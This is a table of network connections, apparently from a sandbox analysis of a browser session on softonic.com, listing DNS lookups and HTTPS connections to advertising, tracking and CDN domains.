| US | 23.219.230.135:443 | images.sftcdn.net | tcp |
| US | 199.232.213.91:443 | softonic.com | tcp |
| US | 199.232.213.91:443 | softonic.com | tcp |
| US | 151.101.129.91:443 | sc.sftcdn.net | tcp |
| US | 151.101.129.91:443 | sc.sftcdn.net | tcp |
| GB | 13.224.222.64:443 | sdk.privacy-center.org | tcp |
| US | 8.8.8.8:53 | www.adsensecustomsearchads.com | udp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| GB | 142.250.187.238:443 | www.adsensecustomsearchads.com | tcp |
| US | 8.8.8.8:53 | www.datadoghq-browser-agent.com | udp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | btloader.com | udp |
| GB | 18.172.152.36:443 | www.datadoghq-browser-agent.com | tcp |
| US | 104.22.74.216:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | 91.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.213.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.230.219.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.222.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.152.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.22.104.in-addr.arpa | udp |
| GB | 142.250.180.27:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| GB | 52.84.90.106:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| GB | 142.250.180.27:443 | storage.googleapis.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 172.67.69.19:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | notix.io | udp |
| NL | 139.45.197.253:443 | notix.io | tcp |
| US | 8.8.8.8:53 | 6.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.69.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 253.197.45.139.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons5.gvt3.com | udp |
| US | 8.8.8.8:53 | 5270af5ee5b7e05ab095db74c007355d.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | api.privacy-center.org | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| DE | 162.19.138.119:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| DE | 162.19.138.119:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | id.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| DE | 162.19.138.116:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| GB | 108.138.233.27:443 | api.privacy-center.org | tcp |
| GB | 142.250.187.238:443 | www.adsensecustomsearchads.com | udp |
| GB | 172.217.169.65:443 | 5270af5ee5b7e05ab095db74c007355d.safeframe.googlesyndication.com | tcp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| IE | 54.72.92.11:443 | ap.lijit.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | tcp |
| DE | 46.4.139.58:443 | shb.richaudience.com | tcp |
| DE | 46.4.139.58:443 | shb.richaudience.com | tcp |
| DE | 46.4.139.58:443 | shb.richaudience.com | tcp |
| IE | 52.50.226.183:443 | ad.360yield.com | tcp |
| NL | 185.89.211.84:443 | ib.adnxs.com | tcp |
| US | 104.18.36.155:443 | htlb.casalemedia.com | tcp |
| US | 178.128.135.204:443 | brightcombid.marphezis.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| IE | 108.128.111.241:443 | id.crwdcntrl.net | tcp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | tcp |
| US | 104.18.35.167:443 | cdn-ima.33across.com | tcp |
| GB | 142.250.178.2:443 | partner.googleadservices.com | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 18.245.143.58:443 | tags.crwdcntrl.net | tcp |
| GB | 18.172.154.232:443 | aax.amazon-adsystem.com | tcp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| GB | 172.217.169.65:443 | 5270af5ee5b7e05ab095db74c007355d.safeframe.googlesyndication.com | tcp |
| IE | 54.72.92.11:443 | ap.lijit.com | tcp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| IE | 52.50.226.183:443 | ad.360yield.com | tcp |
| NL | 185.89.211.84:443 | ib.adnxs.com | tcp |
| IE | 108.128.111.241:443 | id.crwdcntrl.net | tcp |
| DE | 162.19.138.116:443 | lb.eu-1-id5-sync.com | tcp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ampcid.google.com | udp |
| US | 8.8.8.8:53 | 27.233.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.139.4.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.35.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.135.128.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lexicon.33across.com | udp |
| US | 8.8.8.8:53 | 150.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.211.89.185.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | ampcid.google.com | tcp |
| US | 8.8.8.8:53 | 183.226.50.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.92.72.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.111.128.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 35.244.193.51:443 | lexicon.33across.com | tcp |
| IE | 34.254.52.227:443 | bcp.crwdcntrl.net | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | syndicatedsearch.goog | udp |
| GB | 172.217.16.238:443 | syndicatedsearch.goog | tcp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| NL | 185.235.87.150:443 | ag.gbc.criteo.com | tcp |
| NL | 185.235.87.44:443 | gem.gbc.criteo.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 185.235.87.44:443 | gem.gbc.criteo.com | tcp |
| US | 8.8.8.8:53 | 206.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.193.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.87.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.87.235.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | visitor.omnitagjs.com | udp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| US | 8.8.8.8:53 | js-sec.indexww.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| GB | 2.21.188.239:443 | ads.pubmatic.com | tcp |
| US | 151.101.65.108:443 | acdn.adnxs.com | tcp |
| US | 172.64.149.180:443 | js-sec.indexww.com | tcp |
| FR | 185.255.84.153:443 | visitor.omnitagjs.com | tcp |
| BE | 23.55.96.24:443 | contextual.media.net | tcp |
| DE | 162.55.233.28:443 | sync.richaudience.com | tcp |
| DE | 162.55.233.28:443 | sync.richaudience.com | tcp |
| US | 8.8.8.8:53 | cacerts.rapidssl.com | udp |
| SE | 192.229.221.95:80 | cacerts.rapidssl.com | tcp |
| US | 8.8.8.8:53 | player.aniview.com | udp |
| US | 8.8.8.8:53 | ssc-cms.33across.com | udp |
| US | 2.20.12.70:443 | player.aniview.com | tcp |
| US | 67.202.105.21:443 | ssc-cms.33across.com | tcp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| US | 8.8.8.8:53 | ssbsync.smartadserver.com | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | api-2-0.spot.im | udp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| NL | 81.17.55.122:443 | ssbsync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| US | 15.197.193.217:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| DE | 37.252.171.21:443 | secure.adnxs.com | tcp |
| DE | 37.252.171.21:443 | secure.adnxs.com | tcp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| US | 54.144.178.48:443 | sync.srv.stackadapt.com | tcp |
| IE | 52.49.169.20:443 | match.prod.bidr.io | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | 108.65.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.233.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.96.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.105.202.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.55.17.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.171.252.37.in-addr.arpa | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| US | 8.8.8.8:53 | jadserve.postrelease.com | udp |
| IE | 54.171.23.218:443 | jadserve.postrelease.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | cs-server-s2s.yellowblue.io | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 54.88.237.240:443 | cs-server-s2s.yellowblue.io | tcp |
| US | 8.8.8.8:53 | bttrack.com | udp |
| US | 35.244.174.68:443 | id.rlcdn.com | tcp |
| US | 64.38.119.44:443 | bttrack.com | tcp |
| US | 8.8.8.8:53 | cdn.indexww.com | udp |
| US | 8.8.8.8:53 | sync.aniview.com | udp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| GB | 18.164.68.117:443 | api-2-0.spot.im | tcp |
| US | 8.8.8.8:53 | 20.169.49.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.178.144.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.23.171.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.174.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.119.38.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.237.88.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.186.46.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | secure-assets.rubiconproject.com | udp |
| US | 8.8.8.8:53 | sync.search.spotxchange.com | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| US | 8.8.8.8:53 | pixel-eu.rubiconproject.com | udp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | udp |
| US | 8.8.8.8:53 | ssbsync-global.smartadserver.com | udp |
| US | 172.67.40.173:443 | mwzeom.zeotap.com | tcp |
| GB | 216.58.201.98:443 | cm.g.doubleclick.net | tcp |
| US | 216.200.232.253:443 | sync.mathtag.com | tcp |
| NL | 69.173.156.149:443 | pixel-eu.rubiconproject.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| US | 80.77.87.163:443 | cs.admanmedia.com | tcp |
| FR | 5.135.209.101:443 | ssbsync-global.smartadserver.com | tcp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | tcp |
| GB | 216.58.201.98:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 117.68.164.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.158.57.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.209.135.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.199.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.232.200.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 52.46.155.104:443 | s.amazon-adsystem.com | tcp |
| ES | 23.60.223.190:443 | secure-assets.rubiconproject.com | tcp |
| US | 199.232.213.91:443 | softonic.com | udp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| BE | 23.55.98.169:443 | eus.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | token.rubiconproject.com | udp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| GB | 163.70.147.23:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | 190.223.60.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.155.46.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.98.55.23.in-addr.arpa | udp |
| NL | 178.250.1.25:443 | csm.nl3.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | 19535c0ff646237f62dc7d48e66cc8d0.safeframe.googlesyndication.com | udp |
| US | 34.120.63.153:443 | prebid.media.net | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.147.35:443 | www.facebook.com | tcp |
| GB | 163.70.147.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 35.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 67.220.224.144:443 | aax-eu.amazon-adsystem.com | tcp |
| NL | 139.45.197.253:443 | notix.io | tcp |
| DE | 162.19.138.119:443 | lb.eu-1-id5-sync.com | tcp |
| DE | 162.19.138.116:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | 144.224.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | en.softonic.com | udp |
| NL | 81.17.55.122:443 | ssbsync.smartadserver.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| IE | 52.49.169.20:443 | match.prod.bidr.io | tcp |
| US | 54.144.178.48:443 | sync.srv.stackadapt.com | tcp |
| US | 35.244.174.68:443 | id.rlcdn.com | udp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| US | 2.19.252.146:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| US | 178.128.135.204:443 | brightcombid.marphezis.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | udp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| NL | 185.89.210.20:443 | ib.adnxs.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| NL | 185.89.210.20:443 | ib.adnxs.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| NL | 185.89.210.20:443 | ib.adnxs.com | tcp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | s.richaudience.com | udp |
| DE | 178.63.241.79:443 | s.richaudience.com | tcp |
| IE | 52.19.230.196:443 | ad.360yield.com | tcp |
| IE | 52.19.230.196:443 | ad.360yield.com | tcp |
| US | 8.8.8.8:53 | 20.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.241.63.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.230.19.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| DE | 46.4.139.58:443 | shb.richaudience.com | tcp |
| US | 8.8.8.8:53 | smartgaga-android-emulator.en.softonic.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| GB | 157.240.221.35:443 | www.facebook.com | tcp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | en.softonic.com | udp |
| US | 151.101.1.91:443 | en.softonic.com | udp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | images.sftcdn.net | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | sdk.privacy-center.org | udp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 35.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| GB | 163.70.147.23:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | wct.softonic.com | udp |
| US | 8.8.8.8:53 | 25f9cc65b58580164f3593d0bc530d12.safeframe.googlesyndication.com | udp |
| US | 172.67.74.173:443 | wct.softonic.com | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| GB | 216.58.212.194:443 | googleads.g.doubleclick.net | udp |
| FR | 185.255.84.151:443 | hb-api.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | js.adscale.de | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| DE | 141.95.98.64:443 | id5-sync.com | tcp |
| GB | 18.245.143.101:443 | js.adscale.de | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | prs.sftcdn.net | udp |
| US | 8.8.8.8:53 | articles-img.sftcdn.net | udp |
| US | 151.101.1.91:443 | prs.sftcdn.net | tcp |
| US | 151.101.1.91:443 | prs.sftcdn.net | tcp |
| US | 151.101.1.91:443 | prs.sftcdn.net | tcp |
| US | 151.101.1.91:443 | prs.sftcdn.net | tcp |
| US | 151.101.1.91:443 | prs.sftcdn.net | tcp |
| US | 151.101.1.91:443 | prs.sftcdn.net | tcp |
| US | 8.8.8.8:53 | ih.adscale.de | udp |
| US | 8.8.8.8:53 | 194.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.74.67.172.in-addr.arpa | udp |
| NL | 23.62.61.178:443 | articles-img.sftcdn.net | tcp |
| NL | 23.62.61.178:443 | articles-img.sftcdn.net | tcp |
| NL | 23.62.61.178:443 | articles-img.sftcdn.net | tcp |
| US | 8.8.8.8:53 | 64.98.95.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.143.245.18.in-addr.arpa | udp |
| DE | 162.19.138.83:443 | id5-sync.com | tcp |
| DE | 3.120.53.223:443 | ih.adscale.de | tcp |
| US | 35.244.193.51:443 | lexicon.33across.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 185.235.87.150:443 | ag.gbc.criteo.com | tcp |
| NL | 185.235.87.44:443 | gem.gbc.criteo.com | tcp |
| US | 8.8.8.8:53 | push-sdk.com | udp |
| DE | 23.88.8.123:443 | push-sdk.com | tcp |
| US | 172.67.74.173:443 | wct.softonic.com | tcp |
| DE | 23.88.8.123:443 | push-sdk.com | tcp |
| US | 8.8.8.8:53 | cd.connatix.com | udp |
| US | 104.18.41.104:443 | cd.connatix.com | tcp |
| US | 8.8.8.8:53 | cds.connatix.com | udp |
| US | 8.8.8.8:53 | uidsync.net | udp |
| DE | 178.63.248.56:443 | uidsync.net | tcp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.53.120.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.41.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.8.88.23.in-addr.arpa | udp |
| DE | 178.63.248.56:443 | uidsync.net | tcp |
| US | 8.8.8.8:53 | capi.connatix.com | udp |
| US | 8.8.8.8:53 | 56.248.63.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ins.connatix.com | udp |
| US | 8.8.8.8:53 | vid.connatix.com | udp |
| US | 8.8.8.8:53 | lit.connatix.com | udp |
| US | 8.8.8.8:53 | notix.io | udp |
| NL | 139.45.197.227:443 | notix.io | tcp |
| US | 8.8.8.8:53 | 227.197.45.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | sync.richaudience.com | udp |
| US | 8.8.8.8:53 | js-sec.indexww.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| GB | 142.250.200.10:443 | imasdk.googleapis.com | tcp |
| US | 8.8.8.8:53 | visitor.omnitagjs.com | udp |
| DE | 157.90.211.246:443 | sync.richaudience.com | tcp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| US | 8.8.8.8:53 | img.connatix.com | udp |
| US | 8.8.8.8:53 | gsf-fl.softonic.com | udp |
| GB | 142.250.200.10:443 | imasdk.googleapis.com | udp |
| US | 199.232.194.133:443 | gsf-fl.softonic.com | tcp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | diagnostics.id5-sync.com | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| US | 8.8.8.8:53 | 246.211.90.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.194.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | m.media-amazon.com | udp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | tcp |
| BE | 23.14.90.104:443 | m.media-amazon.com | tcp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| US | 8.8.8.8:53 | player.aniview.com | udp |
| US | 8.8.8.8:53 | ts.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| GB | 18.245.218.86:443 | ts.amazon-adsystem.com | tcp |
| US | 67.202.105.21:443 | ssc-cms.33across.com | tcp |
| US | 216.239.32.3:443 | csi.gstatic.com | tcp |
| US | 216.239.32.3:443 | csi.gstatic.com | tcp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| NL | 81.17.55.108:443 | ssbsync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | s2.paa-reporting-advertising.amazon | udp |
| GB | 54.192.137.6:443 | s2.paa-reporting-advertising.amazon | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 15.197.193.217:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | cs-server-s2s.yellowblue.io | udp |
| IE | 54.171.23.218:443 | jadserve.postrelease.com | tcp |
| US | 8.8.8.8:53 | bttrack.com | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 8.8.8.8:53 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | udp |
| US | 192.132.33.69:443 | bttrack.com | tcp |
| US | 54.172.224.53:443 | sync.srv.stackadapt.com | tcp |
| US | 54.156.110.223:443 | cs-server-s2s.yellowblue.io | tcp |
| IE | 52.213.253.239:443 | match.prod.bidr.io | tcp |
| NL | 69.173.156.149:443 | token.rubiconproject.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 35.244.174.68:443 | id.rlcdn.com | udp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| GB | 142.250.178.2:443 | cm.g.doubleclick.net | udp |
| GB | 108.156.39.62:443 | tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 54.172.224.53:443 | sync.srv.stackadapt.com | tcp |
| US | 54.156.110.223:443 | cs-server-s2s.yellowblue.io | tcp |
| US | 192.132.33.69:443 | bttrack.com | tcp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.218.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.55.17.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.137.192.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rtb-csync.smartadserver.com | udp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| DK | 37.157.3.26:443 | c1.adform.net | tcp |
| NL | 89.149.193.104:443 | rtb-csync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| DE | 3.127.95.65:443 | match.sharethrough.com | tcp |
| US | 8.8.8.8:53 | ox-rtb-europe-west2.openx.net | udp |
| IE | 52.95.115.196:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | connatix-d.openx.net | udp |
| US | 34.102.143.98:443 | ox-rtb-europe-west2.openx.net | tcp |
| GB | 142.250.200.2:443 | pubads.g.doubleclick.net | udp |
| US | 34.98.64.218:443 | connatix-d.openx.net | tcp |
| US | 34.98.64.218:443 | connatix-d.openx.net | tcp |
| US | 34.98.64.218:443 | connatix-d.openx.net | tcp |
| US | 8.8.8.8:53 | 69.33.132.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.224.172.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.110.156.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.3.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.95.127.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.115.95.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.143.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.64.98.34.in-addr.arpa | udp |
| US | 216.239.32.3:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | assets.connatix.com | udp |
